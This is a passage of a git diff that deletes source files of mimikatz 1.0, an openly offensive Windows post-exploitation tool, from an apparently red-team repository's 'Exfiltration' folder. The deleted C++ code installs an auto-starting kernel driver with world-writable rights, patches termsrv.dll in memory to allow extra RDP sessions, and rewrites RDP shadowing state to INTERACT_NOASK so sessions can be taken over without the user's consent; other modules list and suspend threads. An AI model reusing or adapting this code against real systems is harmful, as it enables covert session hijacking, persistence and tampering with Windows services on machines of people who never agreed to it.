L"STOPPED"; - break; - } - - (*outputStream) << L'\t' << - monService->serviceName << L'\t' << - monService->serviceDisplayName << - endl; - } - } - } - else - (*outputStream) << L"mod_service::getList ; " << mod_system::getWinError() << endl; - - delete vectorServices; - return true; -} - -bool mod_mimikatz_service::mimikatz(vector<wstring> * arguments) -{ - if(SC_HANDLE monManager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_CONNECT | SC_MANAGER_CREATE_SERVICE)) - { - SC_HANDLE monService = NULL; - if(!(monService = OpenService(monManager, L"mimikatz", SERVICE_START))) - { - if(GetLastError() == ERROR_SERVICE_DOES_NOT_EXIST) - { - (*outputStream) << L"[*] Pilote mimikatz non prsent, installation." << endl; - - wstring monPilote = L"mimikatz.sys"; - wstring monPiloteComplet = L""; - if(mod_system::getAbsolutePathOf(monPilote, &monPiloteComplet)) - { - bool fileExist = false; - if(mod_system::isFileExist(monPiloteComplet, &fileExist) && fileExist) - { - if(monService = CreateService(monManager, L"mimikatz", L"mimikatz driver", READ_CONTROL | WRITE_DAC | SERVICE_START, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, monPiloteComplet.c_str(), NULL, NULL, NULL, NULL, NULL)) - { - (*outputStream) << L"[+] Cration du pilote : OK" << endl; - if(mod_secacl::addWorldToMimikatz(&monService)) - (*outputStream) << L"[+] Attribution des droits : OK"; - else - (*outputStream) << L"[-] Attribution des droits : KO ; " << mod_system::getWinError(); - (*outputStream) << endl; - } - else (*outputStream) << L"[!] Impossible de crer le pilote ; " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"[!] Le pilote ne semble pas exister ; " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"[!] Impossible d\'obtenir le chemin absolu du pilote ; " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"[!] Ouverture du pilote mimikatz : KO ; " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"[*] Pilote mimikatz dj prsent" << endl; - - if(monService) - { - if(StartService(monService, 0, NULL) != 0) - (*outputStream) << L"[+] Dmarrage du pilote : OK"; - else - (*outputStream) << L"[-] Dmarrage du pilote : KO ; " << mod_system::getWinError(); - (*outputStream) << endl; - CloseServiceHandle(monService); - } - - CloseServiceHandle(monManager); - } - else (*outputStream) << L"[!] Impossible d\'ouvrir le gestionnaire de service pour cration ; " << mod_system::getWinError() << endl; - return true; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_service.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_service.h deleted file mode 100644 index 368066f..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_service.h +++ /dev/null @@ -1,34 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_system.h" -#include "mod_service.h" -#include <iostream> - -class mod_mimikatz_service -{ -private: - typedef bool (* PMOD_SERVICE_FUNC) (wstring * serviceName, wstring * machineName); - static bool genericFunction(PMOD_SERVICE_FUNC function, vector<wstring> * arguments); -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool list(vector<wstring> * arguments); - - static bool start(vector<wstring> * arguments); - static bool suspend(vector<wstring> * arguments); - static bool resume(vector<wstring> * arguments); - static bool stop(vector<wstring> * arguments); - - static bool query(vector<wstring> * arguments); - - static bool add(vector<wstring> * arguments); - static bool remove(vector<wstring> * arguments); - static bool control(vector<wstring> * arguments); - - static bool mimikatz(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_standard.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_standard.cpp deleted file mode 100644 index e785e0d..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_standard.cpp +++ /dev/null @@ -1,77 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` -http://blog.gentilkiwi.com -benjamin@gentilkiwi.com -Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_standard.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_standard::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(clearScreen, L"cls", L"Efface l\'cran (ne fonctionne pas en xecution distante, via PsExec par exemple)")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(exit, L"exit", L"Quitte MimiKatz")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(reponse, L"reponse", L"Calcule la rponse la Grande Question sur la Vie, l\'Univers et le Reste")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(cite, L"cite", L"Trouve une citation")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(version, L"version", L"Retourne la version de mimikatz")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(sleep, L"sleep", L"Mets en pause mimikatz un certains nombre de millisecondes")); - //monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(test, L"test", L"Routine de test (ne devrait plus tre l en release...")); - return monVector; -} - -/*bool mod_mimikatz_standard::test(vector<wstring> * arguments) -{ - return true; -}*/ - -bool mod_mimikatz_standard::version(vector<wstring> * arguments) -{ - (*outputStream) << MIMIKATZ_FULL << L" (" << __DATE__ << L' ' << __TIME__ << L')' << endl; - return true; -} - -bool mod_mimikatz_standard::clearScreen(vector<wstring> * arguments) -{ - HANDLE hStdOut = GetStdHandle(STD_OUTPUT_HANDLE); - COORD coord = {0, 0}; - DWORD count; - - CONSOLE_SCREEN_BUFFER_INFO csbi; - GetConsoleScreenBufferInfo(hStdOut, &csbi); - - FillConsoleOutputCharacter(hStdOut, L' ', csbi.dwSize.X * csbi.dwSize.Y, coord, &count); - SetConsoleCursorPosition(hStdOut, coord); - - return true; -} - -bool mod_mimikatz_standard::exit(vector<wstring> * arguments) -{ - return false; -} - -bool mod_mimikatz_standard::reponse(vector<wstring> * arguments) -{ - (*outputStream) << L"La rponse est 42." << endl; - return true; -} - -bool mod_mimikatz_standard::cite(vector<wstring> * arguments) -{ - (*outputStream) << L"I edit the world in HEX" << endl; - return true; -} - -bool mod_mimikatz_standard::sleep(vector<wstring> * arguments) -{ - DWORD dwMilliseconds = 1000; - if(!arguments->empty()) - { - wstringstream z; - z << arguments->front(); z >> dwMilliseconds; - } - (*outputStream) << L"Sleep : " << dwMilliseconds << L" ms... " << flush; - Sleep(dwMilliseconds); - (*outputStream) << L"Fin !" << endl; - return true; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_standard.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_standard.h deleted file mode 100644 index dab1350..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_standard.h +++ /dev/null @@ -1,23 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include <iostream> -#include <sstream> - -class mod_mimikatz_standard -{ -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool clearScreen(vector<wstring> * arguments); - static bool exit(vector<wstring> * arguments); - static bool cite(vector<wstring> * arguments); - static bool reponse(vector<wstring> * arguments); - static bool version(vector<wstring> * arguments); - static bool sleep(vector<wstring> * arguments); - static bool test(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_system.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_system.cpp deleted file mode 100644 index 90929b2..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_system.cpp +++ /dev/null @@ -1,40 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_system.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_system::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(user, L"user", L"Affiche l\'utilisateur courant")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(computer, L"computer", L"Affiche le nom d\'ordinateur courant")); - return monVector; -} - -bool mod_mimikatz_system::user(vector<wstring> * arguments) -{ - wstring monUser; - - if(mod_system::getUserName(&monUser)) - (*outputStream) << L"Utilisateur : " << monUser << endl; - else - (*outputStream) << L"mod_system::getUserName : " << mod_system::getWinError(); - - return true; -} - -bool mod_mimikatz_system::computer(vector<wstring> * arguments) -{ - wstring monComputer; - - if(mod_system::getComputerName(&monComputer)) - (*outputStream) << L"Ordinateur : " << monComputer << endl; - else - (*outputStream) << L"mod_system::getComputerName : " << mod_system::getWinError(); - - return true; -} - diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_system.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_system.h deleted file mode 100644 index bd96a01..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_system.h +++ /dev/null @@ -1,17 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_system.h" -#include <iostream> - -class mod_mimikatz_system -{ -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - static bool user(vector<wstring> * arguments); - static bool computer(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_terminalserver.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_terminalserver.cpp deleted file mode 100644 index 9a071b1..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_terminalserver.cpp +++ /dev/null @@ -1,291 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_terminalserver.h" -#include "..\global.h" - -// http://msdn.microsoft.com/library/aa383464.aspx -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_terminalserver::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(sessions, L"sessions")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(processes, L"processes")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(multirdp, L"multirdp", L"Patch le bureau distance pour dpasser 2 connexions simultanes")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(viewshadow, L"viewshadow", L"Affiche l\'tat de la prise de contrle des sessions RDP")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(modifyshadow, L"modifyshadow", L"Modifie l\'tat de la prise de contrle des sessions RDP (DISABLE, INTERACT, INTERACT_NOASK, VIEW, VIEW_NOASK)")); - return monVector; -} - -bool mod_mimikatz_terminalserver::sessions(vector<wstring> * arguments) -{ - vector<mod_ts::KIWI_WTS_SESSION_INFO> mesSessions; - - if(mod_ts::getSessions(&mesSessions, (arguments->size() ? &arguments->front() : NULL))) - { - (*outputStream) << L"SessId\tEtat\tstrEtat" << endl; - for(vector<mod_ts::KIWI_WTS_SESSION_INFO>::iterator maSession = mesSessions.begin(); maSession != mesSessions.end(); maSession++) - { - (*outputStream) << - setw(5) << setfill(wchar_t(' ')) << maSession->id << L'\t' << - setw(5) << setfill(wchar_t(' ')) << maSession->state << L'\t' << - setw(15) << setfill(wchar_t(' ')) << left << stateToType(maSession->state) << right << L'\t' << - maSession->sessionName << - endl; - } - } - else (*outputStream) << L"mod_ts::getSessions : " << mod_system::getWinError() << endl; - return true; -} - - -bool mod_mimikatz_terminalserver::processes(vector<wstring> * arguments) -{ - vector<mod_ts::KIWI_WTS_PROCESS_INFO> mesProcess; - - if(mod_ts::getProcesses(&mesProcess, (arguments->size() ? &arguments->front() : NULL))) - { - (*outputStream) << L"PID\tSessId\tUtilisateur" << endl; - for(vector<mod_ts::KIWI_WTS_PROCESS_INFO>::iterator monProcess = mesProcess.begin(); monProcess != mesProcess.end(); monProcess++) - { - (*outputStream) << - setw(5) << setfill(wchar_t(' ')) << monProcess->pid << L'\t' << - setw(5) << setfill(wchar_t(' ')) << monProcess->sessionId << L'\t' << - setw(48) << setfill(wchar_t(' ')) << left << monProcess->userSid << right << L'\t' << - monProcess->processName << - endl; - } - } - else (*outputStream) << L"mod_ts::getSessions : " << mod_system::getWinError() << endl; - return true; -} - -bool mod_mimikatz_terminalserver::viewshadow(vector<wstring> * arguments) -{ - DWORD session = 0; - PDWORD ptrSession = NULL; - - if(arguments->size() == 1) - { - wstringstream resultat(arguments->front()); - resultat >> session; - ptrSession = &session; - } - - listAndOrModifySession(ptrSession); - return true; -} - -bool mod_mimikatz_terminalserver::modifyshadow(vector<wstring> * arguments) -{ - DWORD session = 0; - PDWORD ptrSession = NULL; - - wstring strState; - DWORD newState = 0; - - if(arguments->size() == 1) - { - strState.assign(arguments->front()); - } - else if(arguments->size() == 2) - { - wstringstream resultat(arguments->front()); - resultat >> session; - ptrSession = &session; - - strState.assign(arguments->back()); - } - - if(!strState.empty()) - { - bool strError = false; - if(_wcsicmp(strState.c_str(), L"DISABLE") == 0) newState = 0; - else if(_wcsicmp(strState.c_str(), L"INTERACT") == 0) newState = 1; - else if(_wcsicmp(strState.c_str(), L"INTERACT_NOASK") == 0) newState = 2; - else if(_wcsicmp(strState.c_str(), L"VIEW") == 0) newState = 3; - else if(_wcsicmp(strState.c_str(), L"VIEW_NOASK") == 0) newState = 4; - else strError = true; - - if(!strError) - listAndOrModifySession(ptrSession, &newState); - else - (*outputStream) << L"Erreur de parsing de l\'argument : " << strState << endl; - } - - return true; -} - -bool mod_mimikatz_terminalserver::listAndOrModifySession(DWORD * id, DWORD * newState) -{ - bool reussite = false; - - vector<mod_patch::OS> mesOS; - mesOS.push_back(mod_patch::WINDOWS_2003_____x86); - mesOS.push_back(mod_patch::WINDOWS_2003_____x64); - mesOS.push_back(mod_patch::WINDOWS_XP_PRO___x86); - mesOS.push_back(mod_patch::WINDOWS_XP_PRO___x64); - - if(mod_patch::checkVersion(&mesOS)) - { -#ifdef _M_X64 - BYTE pattern1NT5[] = {0x48, 0x3B, 0xFE, 0x74, 0x22}; - long offsetToWin = -4; -#elif defined _M_IX86 - BYTE pattern1NT5[] = {0x8D, 0x47, 0x20, 0x53, 0x50, 0xFF, 0x15}; - long offsetToWin = -6; -#endif - mod_service::KIWI_SERVICE_STATUS_PROCESS monService; - wstring serviceName = L"TermService"; - wstring moduleName = L"termsrv.dll"; - - if(mod_service::getUniqueForName(&monService, &serviceName)) - { - mod_process::KIWI_MODULEENTRY32 monModule; - if(mod_process::getUniqueModuleForName(&monModule, &moduleName, &monService.ServiceStatusProcess.dwProcessId)) - { - PBYTE baseAddr = monModule.modBaseAddr; - DWORD taille = monModule.modBaseSize; - - if(HANDLE processHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, monService.ServiceStatusProcess.dwProcessId)) - { - PBYTE addrPattern = NULL; - if(mod_memory::searchMemory(baseAddr, baseAddr + taille, pattern1NT5, &addrPattern, sizeof(pattern1NT5), true, processHandle)) - { - PBYTE addrWinstationListHead = NULL; - - bool resInterm = false; - -#ifdef _M_X64 - long offSet = 0; - resInterm = mod_memory::readMemory(addrPattern + offsetToWin, reinterpret_cast<PBYTE>(&offSet), sizeof(long), processHandle); - addrWinstationListHead = addrPattern + offSet; -#elif defined _M_IX86 - resInterm = mod_memory::readMemory(addrPattern + offsetToWin, reinterpret_cast<PBYTE>(&addrWinstationListHead), sizeof(PBYTE), processHandle); -#endif - if(resInterm) - { - PBYTE addrWinstation = addrWinstationListHead; - do - { - if(mod_memory::readMemory(addrWinstation, reinterpret_cast<PBYTE>(&addrWinstation), sizeof(PBYTE), processHandle) && addrWinstation != addrWinstationListHead) - { - KIWI_TS_SESSION * maSession = new KIWI_TS_SESSION(); - if(reussite = mod_memory::readMemory(addrWinstation, reinterpret_cast<PBYTE>(maSession), sizeof(KIWI_TS_SESSION), processHandle)) - { - if((!id) || (maSession->id == *id)) - { - (*outputStream) << L"@Winstation : " << addrWinstation << endl; - - (*outputStream) << L"\t" << maSession->prev << L" <-> " << maSession->next << endl; - (*outputStream) << L"\tid : " << maSession->id << endl; - (*outputStream) << L"\tname : " << maSession->name << endl; - (*outputStream) << L"\tsname : " << maSession->sname << endl; - (*outputStream) << L"\ttype : " << maSession->type << endl; - (*outputStream) << L"\tshadow : " << maSession->shadow << L" (" << shadowToType(maSession->shadow) << L")" << endl; - - if(newState) - { - reussite = mod_memory::writeMemory(addrWinstation + FIELD_OFFSET(KIWI_TS_SESSION, shadow), newState, sizeof(DWORD), processHandle); - (*outputStream) << L"\t => " << *newState << L" (" <<shadowToType(*newState) << L") : " << (reussite ? L"OK" : L"KO") << endl; - } - (*outputStream) << endl; - } - } - delete maSession; - } - } while(addrWinstation != addrWinstationListHead); - } - else (*outputStream) << L"mod_memory::readMemory " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"mod_memory::searchMemory " << mod_system::getWinError() << endl; - - CloseHandle(processHandle); - } - else (*outputStream) << L"OpenProcess " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"mod_process::getUniqueModuleForName : " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"mod_process::getUniqueServiceForName : " << mod_system::getWinError() << endl; - } - return reussite; -} - -bool mod_mimikatz_terminalserver::multirdp(vector<wstring> * arguments) -{ - BYTE PTRN_WIN5_TestLicence[] = {0x83, 0xf8, 0x02, 0x7f}; - BYTE PATC_WIN5_TestLicence[] = {0x90, 0x90}; - LONG OFFS_WIN5_TestLicence = 3; -#ifdef _M_X64 - BYTE PTRN_WN60_Query__CDefPolicy[] = {0x8b, 0x81, 0x38, 0x06, 0x00, 0x00, 0x39, 0x81, 0x3c, 0x06, 0x00, 0x00, 0x75}; - BYTE PATC_WN60_Query__CDefPolicy[] = {0xc7, 0x81, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90, 0xeb}; - BYTE PTRN_WN6x_Query__CDefPolicy[] = {0x39, 0x87, 0x3c, 0x06, 0x00, 0x00, 0x0f, 0x84}; - BYTE PATC_WN6x_Query__CDefPolicy[] = {0xc7, 0x87, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90}; -#elif defined _M_IX86 - BYTE PTRN_WN60_Query__CDefPolicy[] = {0x3b, 0x91, 0x20, 0x03, 0x00, 0x00, 0x5e, 0x0f, 0x84}; - BYTE PATC_WN60_Query__CDefPolicy[] = {0xc7, 0x81, 0x20, 0x03, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x5e, 0x90, 0x90}; - BYTE PTRN_WN6x_Query__CDefPolicy[] = {0x3b, 0x86, 0x20, 0x03, 0x00, 0x00, 0x0f, 0x84}; - BYTE PATC_WN6x_Query__CDefPolicy[] = {0xc7, 0x86, 0x20, 0x03, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90}; -#endif - LONG OFFS_WIN6_Query__CDefPolicy = 0; - - BYTE * PTRN_Licence = NULL; DWORD SIZE_PTRN_Licence = 0; - BYTE * PATC_Licence = NULL; DWORD SIZE_PATC_Licence = 0; - LONG OFFS_PATC_Licence = 0; - if(mod_system::GLOB_Version.dwMajorVersion < 6) - { - PTRN_Licence = PTRN_WIN5_TestLicence; SIZE_PTRN_Licence = sizeof(PTRN_WIN5_TestLicence); - PATC_Licence = PATC_WIN5_TestLicence; SIZE_PATC_Licence = sizeof(PATC_WIN5_TestLicence); - OFFS_PATC_Licence = OFFS_WIN5_TestLicence; - } - else - { - if(mod_system::GLOB_Version.dwMinorVersion < 1) - { - PTRN_Licence = PTRN_WN60_Query__CDefPolicy; SIZE_PTRN_Licence = sizeof(PTRN_WN60_Query__CDefPolicy); - PATC_Licence = PATC_WN60_Query__CDefPolicy; SIZE_PATC_Licence = sizeof(PATC_WN60_Query__CDefPolicy); - } - else - { - PTRN_Licence = PTRN_WN6x_Query__CDefPolicy; SIZE_PTRN_Licence = sizeof(PTRN_WN6x_Query__CDefPolicy); - PATC_Licence = PATC_WN6x_Query__CDefPolicy; SIZE_PATC_Licence = sizeof(PATC_WN6x_Query__CDefPolicy); - } - OFFS_PATC_Licence = OFFS_WIN6_Query__CDefPolicy; - } - - mod_patch::patchModuleOfService(L"TermService", L"termsrv.dll", PTRN_Licence, SIZE_PTRN_Licence, PATC_Licence, SIZE_PATC_Licence, OFFS_PATC_Licence); - return true; -} - -wstring mod_mimikatz_terminalserver::shadowToType(DWORD shadow) -{ - switch(shadow) - { - case 0: return(L"DISABLE"); - case 1: return(L"INTERACT (confirmation)"); - case 2: return(L"INTERACT_NOASK"); - case 3: return(L"VIEW (confirmation)"); - case 4: return(L"VIEW_NOASK"); - default: return(L"?"); - } -} - -wstring mod_mimikatz_terminalserver::stateToType(DWORD state) -{ - switch(state) - { - case WTSActive: return(L"Active"); - case WTSConnected: return(L"Connected"); - case WTSConnectQuery: return(L"ConnectQuery"); - case WTSShadow: return(L"Shadow"); - case WTSDisconnected: return(L"Disconnected"); - case WTSIdle: return(L"Idle"); - case WTSListen: return(L"Listen"); - case WTSReset: return(L"Reset"); - case WTSDown: return(L"Down"); - case WTSInit: return(L"Init"); - - default: return(L"?"); - } -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_terminalserver.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_terminalserver.h deleted file mode 100644 index 5af9492..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_terminalserver.h +++ /dev/null @@ -1,55 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_ts.h" -#include "mod_process.h" -#include "mod_memory.h" -#include "mod_patch.h" -#include <iostream> - -class mod_mimikatz_terminalserver -{ -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool sessions(vector<wstring> * arguments); - static bool processes(vector<wstring> * arguments); - static bool viewshadow(vector<wstring> * arguments); - static bool modifyshadow(vector<wstring> * arguments); - static bool multirdp(vector<wstring> * arguments); - -private: - static bool listAndOrModifySession(DWORD * id = NULL, DWORD * newState = NULL); - static wstring shadowToType(DWORD shadow); - static wstring stateToType(DWORD state); - - enum KIWI_SHADOW_TYPE { - SHADOW_DISABLE = 0, - SHADOW_INTERACT = 1, - SHADOW_INTERACT_NOASK = 2, - SHADOW_VIEW = 3, - SHADOW_VIEW_NOASK = 4 - }; - - typedef struct _KIWI_TS_SESSION { - PBYTE next; - PBYTE prev; - PBYTE unk1; - PBYTE refLock; - PBYTE unk2; - BYTE unk3[8]; - DWORD id; - wchar_t name[32+1]; - BYTE unk4[7434]; - wchar_t sname[32+1]; - wchar_t type[32+1]; - BYTE unk5[1684]; - DWORD shadow; - } KIWI_TS_SESSION, * PKIWI_TS_SESSION; - -}; - diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.cpp deleted file mode 100644 index 3a8edc0..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.cpp +++ /dev/null @@ -1,138 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_thread.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_thread::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(list, L"list", L"Liste les threads")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(suspend, L"suspend", L"Suspend un thread actif")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(resume, L"resume", L"Reprend un thread suspendu")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(stop, L"stop", L"Arrte un thread")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(quit, L"quit", L"Envoi un message de fermeture un thread")); - return monVector; -} - -bool mod_mimikatz_thread::list(vector<wstring> * arguments) -{ - vector<THREADENTRY32> * vectorThreads = new vector<THREADENTRY32>(); - - DWORD processId = arguments->empty() ? 0 : _wtoi(arguments->front().c_str()); - - if(mod_thread::getList(vectorThreads, arguments->empty() ? NULL : &processId)) - { - (*outputStream) << L"PID\tTID\tprTh" << endl; - for(vector<THREADENTRY32>::iterator monThread = vectorThreads->begin(); monThread != vectorThreads->end(); monThread++) - (*outputStream) << - setw(5) << setfill(wchar_t(' ')) << monThread->th32OwnerProcessID << L'\t' << - setw(5) << setfill(wchar_t(' ')) << monThread->th32ThreadID << L'\t' << - setw(5) << setfill(wchar_t(' ')) << monThread->tpBasePri << - endl; - } - else - (*outputStream) << L"mod_thread::getList ; " << mod_system::getWinError() << endl; - - delete vectorThreads; - return true; -} - -bool mod_mimikatz_thread::resume(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monArgThread = arguments->begin(); monArgThread != arguments->end(); monArgThread++) - { - DWORD threadId = _wtoi(monArgThread->c_str()); - - if(threadId != 0) - { - (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\treprise "; - - if(mod_thread::resume(threadId)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_thread::resume ; " << mod_system::getWinError(); - } - else - (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - - (*outputStream) << endl; - } - - return true; -} - -bool mod_mimikatz_thread::suspend(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monArgThread = arguments->begin(); monArgThread != arguments->end(); monArgThread++) - { - DWORD threadId = _wtoi(monArgThread->c_str()); - - if(threadId != 0) - { - (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tsuspension "; - - if(mod_thread::suspend(threadId)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_thread::suspend ; " << mod_system::getWinError(); - } - else - (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - - (*outputStream) << endl; - } - - return true; -} - -bool mod_mimikatz_thread::stop(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monArgThread = arguments->begin(); monArgThread != arguments->end(); monArgThread++) - { - DWORD threadId = _wtoi(monArgThread->c_str()); - - if(threadId != 0) - { - (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tarrt "; - - if(mod_thread::stop(threadId)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_thread::stop ; " << mod_system::getWinError(); - } - else - (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - - (*outputStream) << endl; - } - - return true; -} - - -bool mod_mimikatz_thread::quit(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monArgThread = arguments->begin(); monArgThread != arguments->end(); monArgThread++) - { - DWORD threadId = _wtoi(monArgThread->c_str()); - - if(threadId != 0) - { - (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tmessage fermeture "; - - if(mod_thread::quit(threadId)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_thread::quit ; " << mod_system::getWinError(); - } - else - (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - - (*outputStream) << endl; - } - - return true; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.h deleted file mode 100644 index fd072bf..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.h +++ /dev/null @@ -1,27 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_system.h" -#include "mod_thread.h" -#include <iostream> -#include <iomanip> - -class mod_mimikatz_thread -{ -private: -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool 